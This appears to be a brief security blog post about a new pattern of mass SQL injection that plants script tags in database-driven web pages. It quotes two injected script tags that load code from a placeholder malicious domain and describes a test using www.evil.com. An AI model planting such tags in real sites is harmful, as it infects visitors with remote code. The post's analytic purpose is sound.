Yesterday, our company's engineer told me that it was a strange thing to our customer's database.
Normal Mass SQL Injection Attack patterns like below.
<script src="http://[malicious site's domain]/fuckjp.js"><script>
New pattern likes below.
<script src="http://[malicious site's domain]"><script>
First, I made a evil script file as web site(www.evil.com)'s index page.
Next, I made a simple HTML page which had a script tag like a infected web page.
If you need the lists of the evil domains used the Mass SQL Injection attack, please visit below site. It is collecting those.